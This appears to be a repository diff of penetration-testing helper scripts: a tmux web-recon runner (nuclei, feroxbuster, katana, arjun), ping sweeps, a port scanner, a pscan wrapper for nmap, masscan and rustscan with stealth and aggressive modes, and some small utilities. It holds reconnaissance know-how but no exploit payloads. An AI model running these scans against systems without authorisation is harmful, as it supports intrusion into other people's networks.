  tmux select-pane -t 2
  if command -v feroxbuster &>/dev/null; then
    # Run feroxbuster, then arjun on discovered URLs
    if command -v arjun &>/dev/null; then
      tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true && echo -e '${GREENSTAR} Starting arjun parameter discovery...${NC}' && arjun -u '$url' -oT arjun_main.txt 2>&1 | tee arjun.log && if [ -f urls.txt ] && [ -s urls.txt ]; then echo -e '${GREENSTAR} Running arjun on discovered URLs...${NC}' && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true; fi && echo -e '${GREEN}✓ Arjun complete${NC}'" C-m
    else
      tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true" C-m
    fi
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ feroxbuster not installed - skipping${NC}' && touch urls.txt" C-m
  fi

  # Pane 3 (bottom-left): katana (web crawler with all output formats)
  tmux select-pane -t 3
  if command -v katana &>/dev/null; then
    # Full katana with all output formats (plain, paths, urls, dirs)
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting katana crawler (full output)...${NC}' && katana -u '$url' -jc -kf all -aff -d 10 -o katana.txt 2>&1 | tee katana.log && katana -u '$url' -jc -kf all -aff -d 10 -f path -o katana_paths.txt && katana -u '$url' -jc -kf all -aff -d 10 -f url -o katana_urls.txt && katana -u '$url' -jc -kf all -aff -d 10 -f udir -o katana_dirs.txt && cat katana_dirs.txt 2>/dev/null | sort -u >> urls.txt && cat katana_paths.txt 2>/dev/null | sed 's/^.//g' >> paths.txt && echo -e '${GREEN}✓ Katana complete (all formats)${NC}'" C-m
  else
    tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ katana not installed - skipping${NC}'" C-m
  fi

  # Pane 4 (bottom-right): Live results dashboard.
  # BUGFIX: the Arjun status line previously mixed && and || in one
  # left-associative chain, so after printing "Found: N parameters" it
  # could ALSO print "Complete (0 parameters)". Rewritten as if/elif/else.
  tmux select-pane -t 4
  tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ LIVE SCAN RESULTS DASHBOARD ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Scan Progress ═══${NC}'; echo; echo -e '${GREEN}Nuclei:${NC}'; [ -f nuclei.txt ] && [ -s nuclei.txt ] && echo \" Found: \$(wc -l < nuclei.txt 2>/dev/null || echo 0) findings\" || echo ' Waiting...'; echo; echo -e '${GREEN}Feroxbuster:${NC}'; [ -f feroxbuster.txt ] && [ -s feroxbuster.txt ] && echo \" Found: \$(wc -l < feroxbuster.txt 2>/dev/null || echo 0) endpoints\" || echo ' Waiting...'; echo; echo -e '${GREEN}Katana:${NC}'; [ -f katana.txt ] && [ -s katana.txt ] && echo \" Crawled: \$(wc -l < katana.txt 2>/dev/null || echo 0) URLs\" || echo ' Waiting...'; echo; echo -e '${GREEN}Arjun:${NC}'; if [ -f arjun_main.txt ] && [ -s arjun_main.txt ]; then echo \" Found: \$(wc -l < arjun_main.txt 2>/dev/null || echo 0) parameters\"; elif [ -f arjun.log ] && grep -q 'complete' arjun.log 2>/dev/null; then echo ' Complete (0 parameters)'; else echo ' Waiting...'; fi; echo; echo -e '${GREEN}URLs Discovered:${NC}'; [ -f urls.txt ] && [ -s urls.txt ] && echo \" Total: \$(sort -u urls.txt 2>/dev/null | wc -l) unique URLs\" && echo && echo -e '${CYAN}Latest URLs:${NC}' && tail -5 urls.txt 2>/dev/null || echo ' None yet'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 3; done" C-m

  # Focus back on top-left pane (nuclei)
  tmux select-pane -t 1

  echo
  echo -e "${GREEN}✓${NC} Tmux web-recon window created"
  echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Web: ${url:0:20}... <--${NC}"
  echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
  echo
  echo -e "${YELLOW}Note:${NC} Feroxbuster will auto-stop after 5 minutes"
  # BUGFIX: stale message - arjun is chained after feroxbuster in pane 2,
  # it does not sleep for a fixed 10 seconds.
  echo -e "${YELLOW}Note:${NC} Arjun starts automatically after feroxbuster finishes"
}
|
||||||
|
|
||||||
|
# Sequential execution (when not in tmux)
|
||||||
|
# Sequential execution (when not in tmux): run each recon tool in turn
# inside the output directory, merging discovered URLs into urls.txt.
# Globals: OUTPUT_DIR (read). Arguments: $1 - target URL.
run_scans_sequential() {
  local url="$1"

  cd "$OUTPUT_DIR"

  echo -e "\n${GREENSTAR} Running nuclei...${NC}"
  command -v nuclei &>/dev/null && nuclei -u "$url" -o nuclei.txt || echo "nuclei not installed"

  echo -e "\n${GREENSTAR} Running feroxbuster (5 min timeout)...${NC}"
  if command -v feroxbuster &>/dev/null; then
    timeout 300 feroxbuster -u "$url" -d 3 --smart --silent --force-recursion -o feroxbuster.txt 2>/dev/null || true
    # BUGFIX: extract full URLs the same way the tmux path does; the
    # previous `awk '{print $1}'` captured the first column of
    # feroxbuster's output (the HTTP status code), filling urls.txt with
    # bare numbers. `|| true` also keeps a missing/empty output file
    # from tripping set -e / pipefail.
    grep -oE 'http[s]?://[^[:space:]]+' feroxbuster.txt 2>/dev/null >> urls.txt || true
  fi

  echo -e "\n${GREENSTAR} Running katana...${NC}"
  if command -v katana &>/dev/null; then
    # || true: a katana failure or missing output file should not abort
    # the remaining scans under set -e / pipefail
    katana -u "$url" -jc -kf all -aff -d 10 -o katana.txt || true
    sort -u katana.txt 2>/dev/null >> urls.txt || true
  fi

  echo -e "\n${GREENSTAR} Running arjun...${NC}"
  if command -v arjun &>/dev/null; then
    arjun -u "$url" -oT arjun_main.txt 2>&1 | tee arjun.log || true
    [ -f urls.txt ] && [ -s urls.txt ] && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true
  fi

  cd ..

  echo -e "\n${GREEN}✓${NC} Web recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
# ---------------------------------------------------------------------------
# Entry point: argument parsing and dispatch.
# ---------------------------------------------------------------------------
if (( $# == 0 )) || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
  show_help
  exit 0
fi

url="$1"

# Reject an explicitly empty first argument (e.g. `web-recon ""`)
if [[ -z "$url" ]]; then
  echo -e "${RED}Error:${NC} URL required"
  echo "Usage: web-recon <url>"
  exit 1
fi

# Verify tooling is present before doing anything
check_tools

# Launch the reconnaissance
run_web_recon "$url"
|
||||||
43
scripts/ping-sweep.py
Normal file
43
scripts/ping-sweep.py
Normal file
|
|
@ -0,0 +1,43 @@
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
|
||||||
|
def ping_sweep(network_prefix):
    """Ping every host in a /24 and return the addresses that replied.

    Args:
        network_prefix: First three octets as a string, e.g. '192.168.1'.

    Returns:
        List of responsive IP address strings.
    """
    live_hosts = []

    # Hosts .1 through .254 inclusive. The original `range(1, 254)` stopped
    # at .253, silently skipping the last usable address of the /24.
    for i in range(1, 255):
        ip = f'{network_prefix}.{i}'
        # flush=True so the partial line shows before the 1s ping wait.
        print(f'Pinging {ip}...', end='', flush=True)
        result = subprocess.run(
            ['ping', '-c', '1', '-W', '1', ip],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,  # hide resolver/permission noise
        )
        if result.returncode == 0:
            print('Host is up')
            live_hosts.append(ip)
        else:
            print('No response')

    return live_hosts
|
||||||
|
|
||||||
|
# Usage (as a library):
#   hosts = ping_sweep('192.168.1')
#   print('\nLive hosts:')
#   print('\n'.join(hosts))


# Entry point: sweep the network prefix given on the command line.
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 pingsweep.py <network_prefix>")
        print("Example: python3 pingsweep.py 192.168.1")
        sys.exit(1)

    live = ping_sweep(sys.argv[1])

    print("\nLive hosts:")
    for addr in live:
        print(addr)
|
||||||
9
scripts/ping-sweep.sh
Normal file
9
scripts/ping-sweep.sh
Normal file
|
|
@ -0,0 +1,9 @@
|
||||||
|
#!/bin/bash
# ping-sweep.sh - Print every host in a /24 that answers a single ping.
# Usage: ping-sweep.sh [network_prefix]    (default: 192.168.1)

# Prefix is now a parameter (the commented-out `ip=$1` suggested this was
# intended); defaults preserve the old hard-coded behavior.
prefix="${1:-192.168.1}"

echo "Scanning..."
for ip in {1..255}; do
    # Print the responding host's address; silence unreachable/error noise.
    ping -c 1 -W 1 "$prefix.$ip" 2>/dev/null | grep "64 bytes" | awk '{print $4}' | tr -d ':'
done
|
||||||
|
|
||||||
19
scripts/pix
Executable file
19
scripts/pix
Executable file
|
|
@ -0,0 +1,19 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: pix
# Description: View images in terminal with mpv
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: pix image.jpg
#        pix *.png
#        pix ~/Pictures/

# Bail out early when the viewer backend is missing.
command -v mpv &>/dev/null || {
    echo "Error: mpv not found. Install with: sudo apt install mpv" >&2
    exit 1
}

# Replace this process with mpv, showing each image until dismissed.
exec mpv \
    --image-display-duration=inf \
    --loop-file=inf \
    "$@"
|
||||||
55
scripts/port-scanner.py
Executable file
55
scripts/port-scanner.py
Executable file
|
|
@ -0,0 +1,55 @@
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import socket
|
||||||
|
import common_ports
|
||||||
|
import re
|
||||||
|
|
||||||
|
|
||||||
|
def get_open_ports(target, port_range, verbose=False):
    """Scan a host for open TCP ports via connect() probes.

    Args:
        target: Hostname or dotted-quad IP address.
        port_range: Two-item sequence [low, high], scanned inclusively.
        verbose: When True, return a formatted report string instead of a list.

    Returns:
        List of open port numbers; an "Error: ..." string when the target
        cannot be resolved; or a report string when verbose is True.
    """
    open_ports = []

    # Resolve the target; distinguish a malformed IP from a bad hostname.
    try:
        ip_addr = socket.gethostbyname(target)
    except socket.gaierror:
        if re.match(r'^\d{1,3}(\.\d{1,3}){3}$', target):
            return "Error: Invalid IP address"
        else:
            return "Error: Invalid hostname"

    # Probe every port in the inclusive range with a 1s connect timeout.
    for port in range(port_range[0], port_range[1] + 1):
        try:
            # `with` guarantees the socket is closed even when connect_ex
            # raises (the original leaked the descriptor on that path).
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(1)
                if s.connect_ex((ip_addr, port)) == 0:
                    open_ports.append(port)
        except OSError:
            # Narrowed from a bare `except:` so Ctrl-C still interrupts.
            continue

    if verbose:
        # Prefer the reverse-DNS name; fall back to what the caller gave us.
        try:
            hostname = socket.gethostbyaddr(ip_addr)[0]
        except socket.herror:
            hostname = target

        output = f"Open ports for {hostname} ({ip_addr})\nPORT SERVICE\n"
        try:
            import common_ports  # optional project lookup table
            for port in open_ports:
                service = common_ports.ports_and_services.get(port, 'unknown')
                output += f"{port:<9}{service}\n"
        except ImportError:
            # No lookup table available: label every service as unknown.
            for port in open_ports:
                output += f"{port:<9}unknown\n"
        return output.strip()

    return open_ports
|
||||||
|
|
||||||
|
|
||||||
|
# Demo invocation, guarded so that merely importing this module no longer
# launches a network scan of scanme.nmap.org (the original print ran
# unconditionally at import time).
if __name__ == "__main__":
    print(get_open_ports("scanme.nmap.org", [20, 80], verbose=True))
|
||||||
226
scripts/ports
Executable file
226
scripts/ports
Executable file
|
|
@ -0,0 +1,226 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: ports
|
||||||
|
# Description: Enhanced port viewer with colors, filtering, and process info
|
||||||
|
# Usage: ports # Show all ports (colorized)
|
||||||
|
# ports -l # Listening only (most common)
|
||||||
|
# ports -p # Show process names
|
||||||
|
# ports 80 # Find what's on port 80
|
||||||
|
# ports tcp # TCP only
|
||||||
|
# ports udp # UDP only
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Print the usage screen. All escape handling goes through printf '%b'
# instead of echo -e, and raw escape codes are replaced by the named
# color constants defined at the top of the file; output is unchanged.
show_help() {
    printf '%b\n' "${BOLD}ports${NC} - Enhanced Port Viewer v${VERSION}"
    printf '\n'
    printf '%b\n' "${BOLD}USAGE:${NC}"
    printf '%s\n' " ports [OPTIONS] [PORT|PROTOCOL]"
    printf '\n'
    printf '%b\n' "${BOLD}OPTIONS:${NC}"
    printf '%b\n' " ${CYAN}-l, --listen${NC} Show listening ports only (default)"
    printf '%b\n' " ${CYAN}-a, --all${NC} Show all connections"
    printf '%b\n' " ${CYAN}-p, --process${NC} Show process names/PIDs"
    printf '%b\n' " ${CYAN}-n, --numeric${NC} Don't resolve hostnames"
    printf '%b\n' " ${CYAN}-h, --help${NC} Show this help message"
    printf '\n'
    printf '%b\n' "${BOLD}FILTERS:${NC}"
    printf '%s\n' " ports 80 # Show what's on port 80"
    printf '%s\n' " ports tcp # TCP connections only"
    printf '%s\n' " ports udp # UDP connections only"
    printf '%s\n' " ports 8000-9000 # Port range"
    printf '\n'
    printf '%b\n' "${BOLD}EXAMPLES:${NC}"
    printf '%s\n' " ports # Listening ports (colorized)"
    printf '%s\n' " ports -p # With process info"
    printf '%s\n' " ports -a # All connections"
    printf '%s\n' " ports 443 # What's on HTTPS port"
    printf '%s\n' " ports tcp -p # TCP with processes"
    printf '\n'
    printf '%b\n' "${BOLD}COLOR LEGEND:${NC}"
    printf '%b\n' " ${GREEN}LISTEN${NC} - Listening for connections"
    printf '%b\n' " ${BLUE}ESTABLISHED${NC} - Active connection"
    printf '%b\n' " ${YELLOW}TIME_WAIT${NC} - Connection closing"
    printf '%b\n' " ${RED}CLOSE_WAIT${NC} - Waiting to close"
}
|
||||||
|
|
||||||
|
# Colorize state
|
||||||
|
# Wrap a socket state name in the color conventionally used for it.
# Arguments: $1 - state string as reported by ss (e.g. LISTEN)
# Outputs:   the state, color-coded, on stdout; unknown states pass through
colorize_state() {
    local state=$1
    local tint=""
    case "$state" in
        LISTEN)               tint=$GREEN ;;
        ESTABLISHED)          tint=$BLUE ;;
        TIME_WAIT|CLOSE_WAIT) tint=$YELLOW ;;
        SYN_SENT|SYN_RECV)    tint=$CYAN ;;
    esac
    if [[ -n "$tint" ]]; then
        echo -e "${tint}${state}${NC}"
    else
        echo "$state"
    fi
}
|
||||||
|
|
||||||
|
# Check if port is "interesting" (not in common_ports)
|
||||||
|
# Return 0 (true) when a port is NOT one of the well-known service ports,
# i.e. when it deserves a second look; return 1 for common ports.
# Arguments: $1 - port number
is_unusual_port() {
    local port=$1
    # Single pattern match against a space-delimited list instead of a loop.
    case " 20 21 22 23 25 53 80 110 143 443 465 587 993 995 3306 5432 6379 8080 8443 " in
        *" ${port} "*) return 1 ;;
    esac
    return 0
}
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
# Argument parsing
# ---------------------------------------------------------------------------
show_listen_only=true
show_process=false
numeric=true
filter_proto=""
filter_port=""

while [[ $# -gt 0 ]]; do
    case $1 in
        -l|--listen)
            show_listen_only=true
            shift
            ;;
        -a|--all)
            show_listen_only=false
            shift
            ;;
        -p|--process)
            show_process=true
            shift
            ;;
        -n|--numeric)
            # Numeric output is already the default (ss -n below).
            numeric=true
            shift
            ;;
        -h|--help)
            show_help
            exit 0
            ;;
        tcp|TCP)
            filter_proto="tcp"
            shift
            ;;
        udp|UDP)
            filter_proto="udp"
            shift
            ;;
        [0-9]*)
            filter_port="$1"
            shift
            ;;
        *)
            echo -e "${RED}Error:${NC} Unknown option: $1" >&2
            echo "Run 'ports --help' for usage information" >&2
            exit 1
            ;;
    esac
done

# ---------------------------------------------------------------------------
# Build the ss invocation from the selected options
# ---------------------------------------------------------------------------
ss_cmd="ss -tuln"
if [[ "$show_listen_only" == "false" ]]; then
    ss_cmd="ss -tun"
fi
if [[ "$show_process" == "true" ]]; then
    # Process names/PIDs require root.
    ss_cmd="sudo ss -tulnp"
    if [[ "$show_listen_only" == "false" ]]; then
        ss_cmd="sudo ss -tunp"
    fi
fi

# Intentional word-splitting: ss_cmd holds a command plus its flags.
output=$($ss_cmd)

# Header
echo -e "${BOLD}${CYAN}Active Ports${NC}"
echo -e "${BOLD}────────────────────────────────────────────────────────────${NC}"

# Parse, filter, and format with awk; the shell loop below only adds color.
echo "$output" | awk -v show_proc="$show_process" -v filter_proto="$filter_proto" -v filter_port="$filter_port" '
NR==1 { next } # Skip header from ss

{
    proto = $1
    state = $2
    local = $5
    peer = $6
    process = ""

    # Extract process info if available (field 7 onward)
    if (show_proc == "true" && NF >= 7) {
        for (i=7; i<=NF; i++) {
            process = process $i " "
        }
    }

    # Filter by protocol
    if (filter_proto != "" && tolower(proto) !~ tolower(filter_proto)) next

    # Extract port: last ":"-separated component of the local address
    split(local, parts, ":")
    port = parts[length(parts)]

    # Filter by port
    if (filter_port != "" && port != filter_port) next

    printf "%-6s %-12s %-25s %-25s", proto, state, local, peer

    if (process != "") {
        printf " %s", process
    }

    printf "\n"
}
' | while IFS= read -r line; do
    # BUG FIX: the original piped `echo -e "$line"` into sed, so the color
    # escapes sed inserted were never interpreted and showed up as literal
    # "\033[..." text. Substitute first, then let printf '%b' render them.
    if [[ "$line" =~ LISTEN ]]; then
        printf '%b\n' "${line/LISTEN/${GREEN}LISTEN${NC}}"
    elif [[ "$line" =~ ESTABLISHED ]]; then
        printf '%b\n' "${line/ESTABLISHED/${BLUE}ESTABLISHED${NC}}"
    elif [[ "$line" =~ TIME_WAIT ]]; then
        printf '%b\n' "${line/TIME_WAIT/${YELLOW}TIME_WAIT${NC}}"
    elif [[ "$line" =~ CLOSE_WAIT ]]; then
        printf '%b\n' "${line/CLOSE_WAIT/${RED}CLOSE_WAIT${NC}}"
    else
        echo "$line"
    fi
done

# Summary
echo
echo -e "${BOLD}${CYAN}Summary:${NC}"
total=$(echo "$output" | wc -l)
# wc counts the ss header line too, hence the -1.
echo " Total connections: $((total - 1))"

if [[ "$show_listen_only" == "true" ]]; then
    echo -e " ${GREEN}Tip:${NC} Use 'ports -a' to see all connections"
fi

if [[ "$show_process" == "false" ]]; then
    echo -e " ${GREEN}Tip:${NC} Use 'ports -p' to see process information"
fi
|
||||||
10
scripts/prettypath
Executable file
10
scripts/prettypath
Executable file
|
|
@ -0,0 +1,10 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: prettypath
# Description: Display $PATH with one directory per line
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: prettypath

# tr maps every ':' separator to a newline in one pass.
printf '%s\n' "$PATH" | tr ':' '\n'
|
||||||
250
scripts/pscan
Executable file
250
scripts/pscan
Executable file
|
|
@ -0,0 +1,250 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: pscan
|
||||||
|
# Description: Unified port scanner wrapper (nmap/masscan/rustscan)
|
||||||
|
# Usage: pscan <target> # Quick scan with best available tool
|
||||||
|
# pscan <target> -f # Full port scan (all 65535)
|
||||||
|
# pscan <target> -u # UDP scan
|
||||||
|
# pscan <target> -v # Version detection
|
||||||
|
# pscan <target> -s # Stealth scan
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Print usage, examples, and which scan backends are currently installed.
# Restyled with printf '%b' and an explicit if/else per tool instead of
# `cmd && echo … || echo …` chains; output is unchanged.
show_help() {
    printf '%b\n' "${BOLD}pscan${NC} - Unified Port Scanner Wrapper v${VERSION}"
    printf '\n'
    printf '%b\n' "${BOLD}USAGE:${NC}"
    printf '%s\n' " pscan <target> [OPTIONS]"
    printf '\n'
    printf '%b\n' "${BOLD}OPTIONS:${NC}"
    printf '%b\n' " ${CYAN}-f, --full${NC} Scan all 65535 ports"
    printf '%b\n' " ${CYAN}-t, --top${NC} Scan top 1000 ports (default)"
    printf '%b\n' " ${CYAN}-q, --quick${NC} Quick scan (top 100 ports)"
    printf '%b\n' " ${CYAN}-u, --udp${NC} UDP scan"
    printf '%b\n' " ${CYAN}-v, --version${NC} Version detection"
    printf '%b\n' " ${CYAN}-s, --stealth${NC} Stealth SYN scan"
    printf '%b\n' " ${CYAN}-a, --aggressive${NC} Aggressive scan (OS, version, scripts, traceroute)"
    printf '%b\n' " ${CYAN}-o, --output FILE${NC} Save output to file"
    printf '%b\n' " ${CYAN}-h, --help${NC} Show this help"
    printf '\n'
    printf '%b\n' "${BOLD}TOOL PREFERENCE:${NC}"
    printf '%s\n' " 1. rustscan (fastest, if available)"
    printf '%s\n' " 2. masscan (fast, if available)"
    printf '%s\n' " 3. nmap (fallback, always available)"
    printf '\n'
    printf '%b\n' "${BOLD}EXAMPLES:${NC}"
    printf '%s\n' " pscan 192.168.1.1 # Quick scan"
    printf '%s\n' " pscan 192.168.1.0/24 # Scan subnet"
    printf '%s\n' " pscan 10.10.10.5 -f # Full port scan"
    printf '%s\n' " pscan target.com -v # Version detection"
    printf '%s\n' " pscan 10.0.0.1 -s # Stealth scan"
    printf '%s\n' " pscan 192.168.1.1 -o scan.txt # Save output"
    printf '\n'
    printf '%b\n' "${BOLD}INSTALLED TOOLS:${NC}"
    local tool hint
    for tool in rustscan masscan nmap; do
        case "$tool" in
            rustscan) hint="cargo install rustscan" ;;
            *)        hint="sudo apt install $tool" ;;
        esac
        if command -v "$tool" &>/dev/null; then
            printf '%b\n' " ${GREEN}✓${NC} $tool"
        else
            printf '%b\n' " ${RED}✗${NC} $tool (install: $hint)"
        fi
    done
}
|
||||||
|
|
||||||
|
# Detect best scanner
|
||||||
|
# Pick the fastest available scanner backend and print its name on stdout.
# Preference order: rustscan > masscan > nmap.
# Exits the script when none of the supported tools is installed.
get_scanner() {
    local candidate
    for candidate in rustscan masscan nmap; do
        if command -v "$candidate" &>/dev/null; then
            echo "$candidate"
            return
        fi
    done
    echo -e "${RED}Error:${NC} No port scanner found" >&2
    echo "Install one: sudo apt install nmap masscan" >&2
    exit 1
}
|
||||||
|
|
||||||
|
# Rustscan wrapper
|
||||||
|
# Scan a target with rustscan.
# Globals:   CYAN, NC, BOLD (read) - color escapes
# Arguments: $1 - target host/CIDR
#            $2 - port range (default 1-65535)
#            $3 - extra CLI flags, word-split intentionally (optional)
scan_rustscan() {
    local host="$1"
    local port_spec="${2:-1-65535}"
    local more_flags="${3:-}"

    printf '%b\n' "${CYAN}[*]${NC} Using rustscan for ${BOLD}${host}${NC}"
    printf '%b\n' "${CYAN}[*]${NC} Ports: ${port_spec}"
    echo

    # shellcheck disable=SC2086 -- extra flags must word-split
    rustscan -a "$host" -r "$port_spec" --ulimit 5000 $more_flags
}
|
||||||
|
|
||||||
|
# Masscan wrapper
|
||||||
|
# Scan a target with masscan (needs root for raw packets).
# Globals:   CYAN, NC, BOLD (read) - color escapes
# Arguments: $1 - target host/CIDR
#            $2 - port range (default 0-65535)
#            $3 - transmit rate in packets per second (default 1000)
# Outputs:   banner lines, then masscan's own output (open ports only)
scan_masscan() {
    local target="$1"
    local ports="${2:-0-65535}"
    local rate="${3:-1000}"

    echo -e "${CYAN}[*]${NC} Using masscan for ${BOLD}$target${NC}"
    echo -e "${CYAN}[*]${NC} Ports: $ports | Rate: $rate pps"
    echo

    # NOTE(review): no output-file flag is forwarded here, so pscan's -o
    # option appears to be silently ignored on the masscan path — confirm.
    sudo masscan "$target" -p"$ports" --rate="$rate" --open
}
|
||||||
|
|
||||||
|
# Nmap wrapper
|
||||||
|
# Scan a target with nmap (sudo needed for SYN/UDP scans).
# Globals:   CYAN, NC, BOLD (read) - color escapes
# Arguments: $1 - target
#            $2 - scan type flag (default -sS)
#            $3 - port spec, e.g. "-p-" or "--top-ports 1000" (default -p-)
#            $4 - extra flags (optional)
scan_nmap() {
    local target="$1"
    local scan_type="${2:--sS}"
    local ports="${3:--p-}"
    local extra_args="${4:-}"

    echo -e "${CYAN}[*]${NC} Using nmap for ${BOLD}$target${NC}"
    echo -e "${CYAN}[*]${NC} Scan type: $scan_type | Ports: $ports"
    echo

    # FIX: $ports and $extra_args are deliberately unquoted — multi-word
    # specs like "--top-ports 1000" must split into separate arguments.
    # (Quoting "$ports", as before, passed the whole spec as ONE argument
    # and made nmap reject it.)
    # shellcheck disable=SC2086
    sudo nmap "$scan_type" $ports $extra_args "$target"
}
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
# Entry point: parse arguments, pick a backend, run the scan
# ---------------------------------------------------------------------------
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

target="$1"
shift

# Default settings
mode="top"
scan_type="tcp"
output_file=""
extra_args=""   # FIX: initialized up front — previously unset on the masscan
                # path, which aborted under `set -u` whenever -o was used
scanner=$(get_scanner)
aggressive=false
version_detect=false
stealth=false

# Parse options
while [[ $# -gt 0 ]]; do
    case $1 in
        -f|--full)
            mode="full"
            shift
            ;;
        -t|--top)
            mode="top"
            shift
            ;;
        -q|--quick)
            mode="quick"
            shift
            ;;
        -u|--udp)
            scan_type="udp"
            shift
            ;;
        -v|--version)
            version_detect=true
            shift
            ;;
        -s|--stealth)
            stealth=true
            shift
            ;;
        -a|--aggressive)
            aggressive=true
            shift
            ;;
        -o|--output)
            output_file="$2"
            shift 2
            ;;
        *)
            echo -e "${RED}Error:${NC} Unknown option: $1"
            exit 1
            ;;
    esac
done

# Build scan command based on scanner and options
case "$scanner" in
    rustscan)
        case "$mode" in
            full)  ports="1-65535" ;;
            top)   ports="1-10000" ;;
            quick) ports="1-1000" ;;
        esac

        [[ -n "$output_file" ]] && extra_args="$extra_args -o $output_file"

        scan_rustscan "$target" "$ports" "$extra_args"
        ;;

    masscan)
        case "$mode" in
            full)  ports="0-65535"; rate="10000" ;;
            top)   ports="1-10000"; rate="5000" ;;
            quick) ports="1-1000";  rate="1000" ;;
        esac

        [[ -n "$output_file" ]] && extra_args="$extra_args -oL $output_file"
        # NOTE(review): scan_masscan does not accept extra flags, so the
        # -oL output flag built above still has no effect — confirm intent.

        scan_masscan "$target" "$ports" "$rate"
        ;;

    nmap)
        # SYN scan is both the stealth choice and the TCP default.
        if [[ "$stealth" == "true" ]]; then
            nmap_scan="-sS"
        elif [[ "$scan_type" == "udp" ]]; then
            nmap_scan="-sU"
        else
            nmap_scan="-sS"
        fi

        case "$mode" in
            full)  nmap_ports="-p-" ;;
            top)   nmap_ports="--top-ports 1000" ;;
            quick) nmap_ports="--top-ports 100" ;;
        esac

        nmap_extra=""
        [[ "$version_detect" == "true" ]] && nmap_extra="$nmap_extra -sV"
        [[ "$aggressive" == "true" ]] && nmap_extra="$nmap_extra -A"
        [[ -n "$output_file" ]] && nmap_extra="$nmap_extra -oN $output_file"

        scan_nmap "$target" "$nmap_scan" "$nmap_ports" "$nmap_extra"
        ;;
esac

echo
echo -e "${GREEN}[✓]${NC} Scan complete"
# FIX: using `if` here — the old `[[ -n … ]] && echo` made the whole script
# exit with status 1 on a successful run whenever -o was not given.
if [[ -n "$output_file" ]]; then
    echo -e "${GREEN}[✓]${NC} Output saved to: $output_file"
fi
|
||||||
74
scripts/quick-vuln-test.sh
Executable file
74
scripts/quick-vuln-test.sh
Executable file
|
|
@ -0,0 +1,74 @@
|
||||||
|
#!/usr/bin/env bash
# Quick vulnerability testing helper
# Usage: quick-vuln-test.sh <url> <type>
# Types: xss, sqli, idor, csrf

set -euo pipefail

URL="${1:-}"
TYPE="${2:-}"

# Both arguments are mandatory.
if [[ -z "$URL" ]] || [[ -z "$TYPE" ]]; then
    echo "Usage: $0 <url> <type>"
    echo "Types: xss, sqli, idor, csrf"
    exit 1
fi

